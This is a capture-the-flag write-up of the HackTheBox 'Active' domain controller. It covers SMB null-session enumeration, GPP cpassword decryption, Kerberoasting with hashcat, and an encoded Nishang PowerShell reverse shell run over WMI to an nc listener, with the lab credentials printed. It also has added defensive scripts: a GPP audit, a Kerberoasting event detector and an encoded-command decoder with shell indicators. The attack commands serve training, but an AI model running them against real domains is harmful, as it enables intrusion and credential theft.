Target IP: 10.129.6.198
Domain: active.htb
DC Hostname: DC.active.htb
OS: Windows Server 2008 R2 (Domain Controller)
Difficulty: Easy
Author: [g1nt0n1c]


1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery

We initiate an all-ports scan to map the attack surface of the Domain Controller.

# Scan all ports with a high minimum packet rate for speed
nmap -Pn -p- --min-rate 10000 10.129.6.198

Port Analysis & Mapping

  • 53/tcp (DNS): Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1).
  • 88/tcp (Kerberos): Windows Kerberos architecture identified.
  • 139/445/tcp (SMB): Message signing is enabled and required.
  • 389/3268/tcp (LDAP): Active Directory LDAP indicating domain active.htb.

1.2 SMB Enumeration

Running Netexec against SMB confirms the exact OS build and reveals a critical misconfiguration, Null Auth: True, meaning the server accepts anonymous (null-session) SMB logins.

nxc smb 10.129.6.198
# Output: Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (Null Auth:True)
 
# Leverage the Null session to enumerate readable shares
nxc smb 10.129.6.198 -u '' -p '' --shares
SMB         10.129.6.198    445    DC               Share           Permissions     Remark
SMB         10.129.6.198    445    DC               -----           -----------     ------
SMB         10.129.6.198    445    DC               ADMIN$                          Remote Admin
SMB         10.129.6.198    445    DC               C$                              Default share
SMB         10.129.6.198    445    DC               IPC$                            Remote IPC
SMB         10.129.6.198    445    DC               NETLOGON                        Logon server share 
SMB         10.129.6.198    445    DC               Replication     READ            
SMB         10.129.6.198    445    DC               SYSVOL                          Logon server share 
SMB         10.129.6.198    445    DC               Users 

2. Phase 2: Vulnerability Analysis & Initial Access

2.1 Exploring the Replication Share

Using smbclient, we connect to the readable Replication share and recursively download its contents for offline inspection.

# Connect with a null session (-N can also be used)
smbclient //10.129.6.198/Replication
prompt off
recurse on
mget *

2.2 GPP Password Extraction (CVE-2014-1812)

Given the older OS (Server 2008), we search the downloaded policy files for Group Policy Preferences (GPP) credentials.

# Search recursively for the string "pass" in the downloaded XML files
grep -rn "pass" .
# Found in Groups.xml: cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Microsoft accidentally published the static AES key used to encrypt these passwords. We can use the built-in Kali tool gpp-decrypt to recover the plaintext.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
# Decrypted Password: GPPstillStandingStrong2k18
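The following script is an added example for this write-up, not part of the original post and not the code of gpp-decrypt or any other tool named here. It shows the check a defender runs on SYSVOL (or on a copied Replication share) to find GPP items that still carry a cpassword attribute: it walks the tree, parses the preference XML files, and reports every item whose Properties element stores a non-empty cpassword. The Groups.xml it scans is constructed inline, and the mapping of file names to account attributes is my assumption based on the GPP XML schema.

```python
"""Audit a SYSVOL (or copied Replication share) tree for Group Policy Preferences
items that still store a cpassword attribute, the weakness behind MS14-025 / CVE-2014-1812.

Added example for this write-up; not from the original post or from gpp-decrypt.
The Groups.xml below is constructed sample data."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP files that can embed credentials, mapped to the attribute that names the
# account the cpassword belongs to (assumption: attribute names per the GPP XML schema).
GPP_FILES = {
    "Groups.xml": "userName",
    "Services.xml": "accountName",
    "ScheduledTasks.xml": "runAs",
    "DataSources.xml": "username",
    "Drives.xml": "username",
    "Printers.xml": "username",
}

# Constructed sample: one user item with a stored password, one without.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="labsvc" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="CONSTRUCTEDBLOBNOTAREALSECRET+AAAA" changeLogon="0" noChange="1"
      neverExpires="1" acctDisabled="0" userName="lab.local\\labsvc"/>
  </User>
  <User name="helpdesk" changed="2018-07-18 20:50:00">
    <Properties action="U" newName="" fullName="" description="" cpassword=""
      userName="lab.local\\helpdesk"/>
  </User>
</Groups>
"""


def scan_gpp_tree(root_dir):
    """Return one finding per GPP item whose Properties carry a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            # SYSVOL file names vary in case; match the known GPP files case-insensitively.
            key = next((k for k in GPP_FILES if k.lower() == fname.lower()), None)
            if key is None:
                continue
            path = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed XML: skip the file rather than abort the audit
            for props in tree.getroot().iter("Properties"):
                cpass = props.get("cpassword")
                if not cpass:  # attribute absent or empty: nothing stored
                    continue
                findings.append({
                    "file": os.path.relpath(path, root_dir),
                    "item": key,
                    "account": props.get(GPP_FILES[key]) or "?",
                    "cpassword_len": len(cpass),
                })
    return findings


def demo():
    """Write the constructed Groups.xml into a temporary policy tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        policy_dir = os.path.join(tmp, "Policies", "{CONSTRUCTED-GPO-GUID}",
                                  "MACHINE", "Preferences", "Groups")
        os.makedirs(policy_dir)
        with open(os.path.join(policy_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_gpp_tree(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['file']}: {finding['item']} item stores a password for "
              f"{finding['account']} ({finding['cpassword_len']} chars)")
```

MS14-025 removed the ability to save new cpassword values but left existing XML files untouched, so any hit this audit reports means the item should be deleted from the GPO and the affected account's password rotated. Run it against the SYSVOL root (or the downloaded share) rather than a single file; the helpdesk item in the sample shows that an empty cpassword is not a finding.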

2.3 Validating Credentials

We verify that the discovered credentials map to a valid, active user account (SVC_TGS, the userName given in the same Groups.xml entry).

nxc smb 10.129.6.198 -u SVC_TGS -p "GPPstillStandingStrong2k18"
# [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

3. Phase 3: Privilege Escalation (Kerberoasting)

3.1 Extracting Service Tickets

With a valid domain account, we query LDAP for user accounts associated with Service Principal Names (SPNs) to perform a Kerberoasting attack.

nxc ldap 10.129.6.198 -u SVC_TGS -p "GPPstillStandingStrong2k18" --kerberoasting kerberoasting.hash
# Extracts a vulnerable TGS ticket for the 'Administrator' account.

3.2 Hash Cracking

We use Hashcat against the exported TGS ticket to crack the service account password.

# Mode 13100 (Kerberos 5, etype 23, TGS-REP) matches the $krb5tgs$23$ hashes nxc writes
hashcat -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
# Cracked Password: Ticketmaster1968
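The Kerberoasting in sections 3.1 and 3.2 leaves a trace on the domain controller: each service ticket request is logged as event 4769 when "Audit Kerberos Service Ticket Operations" is enabled. The script below is an added example for this write-up (not part of the original post and not an nxc or hashcat feature) that applies two detection rules to such events: an RC4 (etype 0x17) ticket for a user-owned SPN account, and one requester collecting tickets for many distinct services in a short window. The events are constructed, the field names follow the 4769 schema, and the threshold and window are assumptions to tune per environment.

```python
"""Flag Kerberoasting-style TGS activity in Windows 4769 (service ticket requested) events.

Added example for this write-up, not from the original post. The events below are
constructed; a real pipeline would feed them from the Security log or a SIEM."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                     # TicketEncryptionType for RC4, what Kerberoasters ask for
WINDOW = timedelta(minutes=5)         # assumption: tune to the environment
DISTINCT_SERVICE_THRESHOLD = 3        # assumption: tune to the environment

# (TimeCreated, TargetUserName = requester, ServiceName = account the ticket is for,
#  TicketEncryptionType, IpAddress). Constructed sample data.
EVENTS = [
    ("2024-05-01T10:00:01", "SVC_TGS@ACTIVE.HTB", "DC$",           "0x12", "10.129.6.198"),
    ("2024-05-01T10:00:02", "SVC_TGS@ACTIVE.HTB", "krbtgt",        "0x12", "10.129.6.198"),
    ("2024-05-01T10:01:10", "SVC_TGS@ACTIVE.HTB", "Administrator", "0x17", "10.10.14.230"),
    ("2024-05-01T10:01:11", "SVC_TGS@ACTIVE.HTB", "sqlsvc",        "0x17", "10.10.14.230"),
    ("2024-05-01T10:01:12", "SVC_TGS@ACTIVE.HTB", "websvc",        "0x17", "10.10.14.230"),
    ("2024-05-01T11:30:00", "jsmith@ACTIVE.HTB",  "websvc",        "0x12", "10.129.6.50"),
]


def is_roastable_target(service):
    """Computer accounts (trailing $) and krbtgt are requested constantly and have
    random passwords; only user-owned SPN accounts are worth cracking."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoasting(events, window=WINDOW, threshold=DISTINCT_SERVICE_THRESHOLD):
    """Return alerts as (rule, requester, service(s), client_ip, timestamp) tuples."""
    parsed = sorted(
        ((datetime.fromisoformat(t), u, s, e, ip) for t, u, s, e, ip in events),
        key=lambda r: r[0],
    )
    alerts = []

    # Rule 1: any RC4 service ticket for a user-owned SPN account. With AES keys set on
    # the account, a client asking for RC4 is downgrading on purpose.
    for ts, user, service, etype, ip in parsed:
        if etype == RC4_HMAC and is_roastable_target(service):
            alerts.append(("rc4_tgs", user, service, ip, ts.isoformat()))

    # Rule 2: one requester sweeping many distinct SPN accounts inside the window,
    # which is what a tool pulling every roastable ticket at once looks like.
    per_user = defaultdict(list)
    for ts, user, service, _etype, _ip in parsed:
        if is_roastable_target(service):
            per_user[user].append((ts, service))
    for user, reqs in per_user.items():
        for i, (start, _service) in enumerate(reqs):
            services = {s for ts, s in reqs[i:] if ts - start <= window}
            if len(services) >= threshold:
                alerts.append(("spn_sweep", user, ",".join(sorted(services)), None, start.isoformat()))
                break  # one sweep alert per requester is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(EVENTS):
        print(alert)
```

Rule 1 is only clean once the SPN accounts have AES keys and RC4 is no longer negotiated in normal traffic; on a 2008 R2 era domain like this one it will also fire on legitimate RC4 use, so start with rule 2 and the RC4 rule scoped to high-value accounts. The mitigation side is the same in both cases: long random passwords or gMSAs for SPN accounts, and no SPN on Administrator at all.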

4. Phase 4: Domain Escalation & Execution

4.1 Validating Administrator Access

Before dropping a shell, we confirm our newly cracked Administrator password works against LDAP/SMB.

nxc ldap 10.129.6.198 -u administrator -p "Ticketmaster1968"
# [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

4.2 Establishing a Reverse Shell

Manual shells via WMI are more stable. We will convert Nishang’s TCP One-Liner into an encoded PowerShell payload.

# Copy Nishang payload and convert to UTF-16LE Base64 blob
cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 . 
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t UTF-16LE | base64 -w0
# Output: JABjAGwAaQ...bABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKAA==

Set up the local listener and execute the payload via Netexec.

# Terminal 1: Start Listener
rlwrap nc -lvnp 4444
 
# Terminal 2: Execute Exploit via WMI
nxc smb 10.129.6.198 -u administrator -p "Ticketmaster1968" -X "powershell -enc JABjAGwAaQ...=="
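The encoded command in 4.2 is what shows up in a process-creation record (4688 or Sysmon event 1) on the target, and it is opaque until the Base64 is decoded as UTF-16LE. The script below is an added example for this write-up, not part of the original post and not Nishang code: it performs the same transform as `iconv -t UTF-16LE | base64 -w0` to build a constructed sample, then decodes the `-enc` argument from a command line and scores the plaintext against a short indicator list. The indicator list and the socket-opening fragment used as sample input are my assumptions; the fragment only opens a connection and is not the payload from the box.

```python
"""Decode a PowerShell -enc/-EncodedCommand argument from a logged command line and
score the plaintext for reverse-shell indicators.

Added example for this write-up; not from the original post or from Nishang.
The command lines below are constructed."""
import base64
import re

# Strings that, once decoded, point at an outbound shell or remote code fetch rather
# than an admin script. Assumption: a starting list, extend per environment.
INDICATORS = ("Net.Sockets.TCPClient", "GetStream(", "Invoke-Expression", "IEX", "DownloadString")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternatives first.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script):
    """Same transform as `iconv -t UTF-16LE | base64 -w0`: the Base64 wraps UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext script if the command line carries an encoded command, else None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not Base64/UTF-16LE: report as undecodable instead of crashing the parser


def score_command(cmdline):
    """Decode and classify one logged command line."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": None, "hits": [], "suspicious": False}
    lowered = script.lower()
    hits = [ind for ind in INDICATORS if ind.lower() in lowered]
    return {"decoded": script, "hits": hits, "suspicious": len(hits) >= 2}


# Constructed samples. The first opens a socket and nothing else; the second is routine admin use.
SAMPLE_SCRIPT = ('$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);'
                 '$stream = $client.GetStream()')
SAMPLE_4688_CMDLINE = "powershell -enc " + encode_powershell(SAMPLE_SCRIPT)
BENIGN_CMDLINE = "powershell -EncodedCommand " + encode_powershell(
    "Get-Service | Where-Object Status -eq Running")


if __name__ == "__main__":
    for line in (SAMPLE_4688_CMDLINE, BENIGN_CMDLINE, "powershell -File backup.ps1"):
        result = score_command(line)
        print(result["suspicious"], result["hits"], (result["decoded"] or "")[:60])
```

Decoding is the important step: matching on the Base64 blob itself is useless because every change to the host or port produces a different string. Note that `-enc` is only one route; Script Block Logging (event 4104) records the decoded script regardless of how it was launched and is the more reliable source where it is enabled.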

4.3 Shell Verification

Check the listener to confirm the reverse connection and the account it runs as.

connect to [10.10.14.230] from (UNKNOWN) [10.129.6.198] 49370
 
whoami
# PS C:\> active\administrator 

New things learnt

  • nxc has a --kerberoasting module which speeds up the process.
  • nishang has a good PowerShell one-liner.
  • Need to convert PowerShell revshells to make them usable as an encoded command: iconv -t UTF-16LE | base64 -w0

Checklist added

kerberoasting